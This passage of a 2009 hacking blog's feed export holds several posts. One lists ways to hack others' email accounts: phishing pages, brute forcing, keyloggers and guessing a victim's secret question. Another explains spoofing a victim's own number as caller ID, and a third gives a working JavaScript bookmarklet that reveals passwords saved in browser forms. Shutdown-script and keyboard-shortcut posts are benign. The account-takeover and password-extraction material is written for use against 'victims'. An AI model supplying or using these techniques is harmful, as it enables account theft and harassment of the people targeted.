0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;When thats done, the user (is made to believe that it's the real website) so he/her types his/hers username and password...and automatically the username and password will be sent to you by mail or in some cases saved onto a Log.txt file.&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;There you have it, that's Phishing.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;Will be writing the tutorials soon check for the coming posts for it..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;span style="font-weight: bold;"&gt;2.Brute Forcing:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;/b&gt;Brute Forcing is like guessing the password , but instead you make/download a password list (a long .txt file containing words that the password might be) and the Brute Forcer tries them all...&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;You probably have the lesser chance of getting the password this way. The disadvantage of using Bruteforce to crack passwords is the time it takes to crack the password...it takes very long which is not desirable for a busy hacker schedule....&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;Will be posting more on this soon..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;3.Keyloggers&lt;/span&gt;:&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;This method i found very efficient in hacking passwords.&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Keyloggers are like phishing but is more simple. Its a simple .exe file. When someone clicks it, the Keylogger auto downloads&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Start it, on your/their&amp;nbsp;computer, and put in the IP or Email (for some), and every hour etc&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;You'll receive keys pressed on his/her computer thats an easy way to find out passwords...Although they are normally found out!&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;A keylogger records all keystrokes on computer that the victim makes and automatically you are able to record his passwords and finally accomplish the goal of hacking his email account.&lt;span style="color: #3c78a7;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;wait for coming tutorials..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;4.Guessing The Secret Question:&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;/span&gt;&lt;span style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;This is pretty orthodox method of password cracking which uses "Forgot password" link, but is of great help sometimes.&lt;/span&gt;&lt;span style="font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;/span&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;If you know your friends, this will be an easy task. Go to http://www.hotmail.com or whatever email provider victim is using and click "Forgot Password", then put in their email address...and then the CATCHA code. Reply to the secret question (and If you get it right, you Have his Password! or can reset it..)&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;But beware because you have like 3 tries only..&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Well I think that I've covered "almost" All top ways of "How to Hack an Email"&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;many more exists like:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;Pharming,&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;Whaling,&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;Cookie Stealer,&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;b&gt;Fake Messenger&lt;/b&gt;, etc, etc which will be covered in the coming post after the explanation of the above methods...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;Njoy..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Arial, Helvetica; font-size: small;"&gt;&lt;span style="font-size: 12px; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal;"&gt;&lt;a href="http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html"&gt;Hack Gmail&lt;/a&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-1520003615521978461?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/1520003615521978461/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hacking-email-account-passwords.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/1520003615521978461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/1520003615521978461'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hacking-email-account-passwords.html' title='Hacking Email Account Passwords... hack Gmail..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-4013226767275236007</id><published>2009-10-03T21:58:00.000+05:30</published><updated>2009-10-03T21:58:51.302+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Mobile Hack'/><title type='text'>Call Your Friends With Their Own Number..</title><content type='html'>Here is a new Post for Mobile Hacking&amp;nbsp;&lt;span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: 15px; line-height: 22px;"&gt;with useful prank to confuse your friends. With this mobile hack, you can call your friends with their own mobile number... meaning by, they will see their own number calling them. Just follow the guidelines I have mentioned in this mobile hack article.&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/Ssd6q7rKbnI/AAAAAAAAABo/hy5-lNuoMD8/s1600-h/cellphone_lock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/Ssd6q7rKbnI/AAAAAAAAABo/hy5-lNuoMD8/s320/cellphone_lock.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
1. Go to&amp;nbsp;&lt;a href="http://www.mobivox.com/" style="color: #2b6690; text-decoration: underline;"&gt;&lt;span style="color: #3333ff;"&gt;http://www.mobivox.com&lt;/span&gt;&lt;/a&gt;&amp;nbsp;and register there for free account.&lt;br /&gt;
&lt;br /&gt;
2. During registration, remember to insert Victim cell phone number in "Phone number" in the field..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;3. Complete registration and confirm your email account id and then login to your account. Click on "Direct WebCall".&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;4. You will arrive at page where you have to Enter Details. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own cell phone number.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;5. That's it. Your friend will be shocked to see his own number calling him. Njoy..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;Thus, use this&lt;strong style="color: black; display: block; font-size: 16px; text-decoration: none;"&gt;cool mobile hack&lt;/strong&gt;to surprise and shock your friends. This mobile hack is free. So, you don't need to lose a buck. Simply register and you'll be able to perform this mobile hack. This mobile hack is available for almost all countries and all cell phones network providers. If you have any problem in implementing this mobile hack, please mention it in comments.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Georgia, 'Times New Roman', Times, serif; font-size: medium;"&gt;&lt;span class="Apple-style-span" style="font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-4013226767275236007?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/4013226767275236007/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/call-your-friends-with-their-own-number.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4013226767275236007'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4013226767275236007'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/call-your-friends-with-their-own-number.html' title='Call Your Friends With Their Own Number..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_5rpSJrmeITE/Ssd6q7rKbnI/AAAAAAAAABo/hy5-lNuoMD8/s72-c/cellphone_lock.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-7431956746671525312</id><published>2009-10-03T21:47:00.001+05:30</published><updated>2009-10-03T21:47:57.044+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Scripts'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>ShortCut To ShutDown Screen..</title><content type='html'>1. Copy the following code to the Notepad.&lt;br /&gt;
&lt;br /&gt;
(new  ActiveXObject("Shell.Application")).ShutdownWindows(); &lt;br /&gt;
&lt;br /&gt;
2. Save the file  as ShutDown.js&lt;br /&gt;
&lt;br /&gt;
3. Run the file, it will bring the ShutDown Screen.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-7431956746671525312?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/7431956746671525312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/shortcut-to-shutdown-screen.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/7431956746671525312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/7431956746671525312'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/shortcut-to-shutdown-screen.html' title='ShortCut To ShutDown Screen..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-3166690054165383146</id><published>2009-10-03T21:20:00.001+05:30</published><updated>2009-10-03T21:39:20.916+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Scripts'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Passwords'/><title type='text'>Finding Password Behind Asterisks...</title><content type='html'>&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="line-height: 15px; white-space: pre-wrap;"&gt;&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;i&gt;There are times when we select remember me option in the login tab. There are many ways to extract the password from it. The easiest one is to get it when the browser fills the password field with asterisks. Just Paste the code below in the navigation bar n Voila.. You have the Password..!!!  &amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/Ssdxxtpf_JI/AAAAAAAAABg/AnQ-8i5upcI/s1600-h/imagem_wallpaper_xp-gloss_15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;i&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/Ssdxxtpf_JI/AAAAAAAAABg/AnQ-8i5upcI/s320/imagem_wallpaper_xp-gloss_15.jpg" /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="line-height: 15px; white-space: pre-wrap;"&gt;&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="line-height: 15px; white-space: pre-wrap;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k&amp;lt;w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i&amp;lt;f.length;i++) {var e=f[i].elements;for(var j=0;j&amp;lt;e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="line-height: 15px; white-space: pre-wrap;"&gt;&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="line-height: 15px; white-space: pre-wrap;"&gt;&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;i&gt; &lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-3166690054165383146?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/3166690054165383146/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/there-are-times-when-we-select-remember.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3166690054165383146'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/3166690054165383146'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/there-are-times-when-we-select-remember.html' title='Finding Password Behind Asterisks...'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_5rpSJrmeITE/Ssdxxtpf_JI/AAAAAAAAABg/AnQ-8i5upcI/s72-c/imagem_wallpaper_xp-gloss_15.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-8818054533040881030</id><published>2009-10-03T20:27:00.000+05:30</published><updated>2009-10-09T17:40:11.676+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>All The Keyboard Shortcuts You Need..</title><content type='html'>&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
Windows key + R = Run menu&lt;br /&gt;
&lt;br /&gt;
This is usually followed by:&lt;br /&gt;
&lt;br /&gt;
cmd = Command Prompt&lt;br /&gt;
iexplore + "web address" = Internet Explorer&lt;br /&gt;
compmgmt.msc = Computer Management&lt;br /&gt;
dhcpmgmt.msc = DHCP Management&lt;br /&gt;
dnsmgmt.msc = DNS Management&lt;br /&gt;
services.msc = Services&lt;br /&gt;
eventvwr = Event Viewer&lt;br /&gt;
dsa.msc = Active Directory Users and Computers&lt;br /&gt;
dssite.msc = Active Directory Sites and Services&lt;br /&gt;
Windows key + E = Explorer&lt;br /&gt;
ALT + Tab = Switch between windows&lt;br /&gt;
ALT, Space, X = Maximize window&lt;br /&gt;
CTRL + Shift + Esc = Task Manager&lt;br /&gt;
Windows key + Break = System properties&lt;br /&gt;
Windows key + F = Search&lt;br /&gt;
Windows key + D = Hide/Display all windows&lt;br /&gt;
CTRL + C = copy&lt;br /&gt;
CTRL + X = cut&lt;br /&gt;
CTRL + V = paste&lt;br /&gt;
&lt;br /&gt;
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Keyboard Shortcuts&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
[Alt] and [Esc] Switch between running applications&lt;br /&gt;
[Alt] and letter Select menu item by underlined letter&lt;br /&gt;
[Ctrl] and [Esc] Open Program Menu&lt;br /&gt;
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)&lt;br /&gt;
[Alt] and [F4] Quit active application or close current window&lt;br /&gt;
[Alt] and [-] Open Control menu for active document&lt;br /&gt;
[Ctrl] Lft., Rt. arrow Move cursor forward or back one word&lt;br /&gt;
[Ctrl] Up, Down arrow Move cursor forward or back one paragraph&lt;br /&gt;
[F1] Open Help for active application&lt;br /&gt;
Windows+M Minimize all open windows&lt;br /&gt;
Shift+Windows+M Undo minimize all open windows&lt;br /&gt;
Windows+F1 Open Windows Help&lt;br /&gt;
Windows+Tab Cycle through the Taskbar buttons&lt;br /&gt;
Windows+Break Open the System Properties dialog box&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Acessability shortcuts&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Right SHIFT for eight seconds........ Switch FilterKeys on and off.&lt;br /&gt;
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.&lt;br /&gt;
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.&lt;br /&gt;
SHIFT....... five times Switch StickyKeys on and off.&lt;br /&gt;
NUM LOCK...... for five seconds Switch ToggleKeys on and off.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-large;"&gt;Explorer shortcuts&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
END....... Display the bottom of the active window.&lt;br /&gt;
HOME....... Display the top of the active window.&lt;br /&gt;
NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.&lt;br /&gt;
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.&lt;br /&gt;
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.&lt;br /&gt;
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.&lt;br /&gt;
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.&lt;br /&gt;
&lt;br /&gt;
